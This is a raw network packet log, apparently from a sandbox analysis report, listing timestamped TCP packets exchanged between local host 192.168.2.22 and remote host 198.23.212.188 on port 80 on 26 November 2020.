Nov 26, 2020 21:22:23.939688921 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.939712048 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.939769030 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.939775944 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.942646027 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.942698956 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.942743063 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.942780972 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.942822933 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.942862034 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.942872047 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.942917109 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.942924023 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.942929029 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943666935 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943707943 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943747044 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943764925 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943782091 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943789005 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943815947 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943829060 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943850040 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943869114 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943881989 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943907976 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943938017 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943955898 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.943984032 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.943999052 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944027901 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944037914 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944065094 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944078922 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944101095 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944118977 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944137096 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944158077 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944171906 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944199085 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944216013 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944238901 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944262028 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944287062 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944294930 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944330931 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944355011 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944369078 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944382906 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944410086 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944432974 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944447994 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944467068 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944487095 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944508076 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944525957 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944544077 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944564104 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944577932 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944612026 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944636106 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944653988 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944677114 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944691896 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944715023 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944731951 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944734097 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944770098 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944772959 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944807053 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944809914 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944827080 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944849968 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944885015 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944886923 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944905043 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944935083 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.944945097 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.944977045 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.945003986 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.945019007 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:23.945038080 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.945084095 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:23.952178955 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.057929993 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.057995081 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058033943 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058070898 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058109999 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058149099 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058197021 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058238983 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058244944 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058274984 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058279991 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058280945 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058305979 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058324099 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058346987 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058365107 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058378935 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058403969 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058428049 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058444023 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058453083 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058482885 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058502913 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058528900 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058532953 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058576107 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.058592081 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.058628082 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.060878992 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.060937881 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.060976982 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.060986042 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061007023 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061017036 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061038017 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061058044 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061073065 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061096907 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061136007 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061175108 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061176062 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061193943 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061224937 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061227083 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061269045 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061295033 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061307907 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061327934 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061347961 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.061367989 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.061388969 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.062903881 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.062944889 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.062983036 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.062997103 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063009977 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063025951 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063051939 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063065052 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063092947 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063106060 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063112974 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063146114 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063172102 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063195944 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063199997 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063240051 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063275099 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063278913 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063298941 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063319921 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063348055 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063360929 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063383102 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063399076 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063425064 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063438892 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063463926 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063477993 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063503981 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063525915 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063529015 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063569069 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063606024 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063606977 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063642979 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063647985 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063680887 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063687086 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063702106 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063724995 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063740015 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063765049 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063791037 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063805103 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063812971 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063853025 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063868999 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063894987 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063920975 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063932896 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063946962 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.063971996 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.063993931 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064011097 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064019918 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064049959 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064081907 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064089060 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064111948 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064129114 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064131975 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064176083 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064218044 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064219952 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064254999 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064254999 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064270973 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064296007 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064318895 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064333916 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064352036 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064372063 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064388037 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064409971 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064434052 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064448118 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064461946 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064496040 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064510107 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064538002 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064558029 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064575911 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064584970 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064615965 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064640045 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064654112 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064675093 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064692020 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064709902 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064730883 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064738035 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064769983 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064801931 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064817905 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064831972 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064860106 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064892054 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064899921 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064914942 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064939976 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.064944029 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.064979076 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065013885 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065015078 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065028906 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065052986 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065071106 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065092087 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065119028 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065139055 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065152884 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065181017 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065202951 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065218925 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065234900 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065258980 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065280914 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065298080 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065310001 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065336943 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065370083 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065376043 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065402985 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065429926 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065440893 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065479040 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065505981 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065517902 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065532923 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065557003 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065577030 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065593958 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065601110 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065633059 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.065656900 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.065690041 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.176862001 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.176932096 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.176971912 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177012920 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177026987 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177052021 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177058935 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177064896 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177068949 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177094936 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177119017 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177134991 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177144051 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177175999 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177190065 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177225113 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177234888 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177268982 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177277088 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177299976 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177328110 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177340984 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177350044 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177381039 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177395105 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177460909 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177464962 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177515984 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177517891 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177556992 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177565098 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177596092 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177611113 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177634954 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177649021 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177675962 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177685022 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177712917 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177731037 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177752972 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177762032 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177793026 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177809000 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177844048 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177845955 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177877903 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177917957 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177953959 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177958012 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.177975893 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.177999020 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.178014994 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.178046942 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.178047895 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.178091049 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.178102970 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.178132057 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.178145885 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.178172112 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.178185940 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.178222895 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.178224087 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.178282022 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179409027 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179434061 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179486036 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179485083 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179501057 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179529905 CET	80	49165	198.23.212.188	192.168.2.22
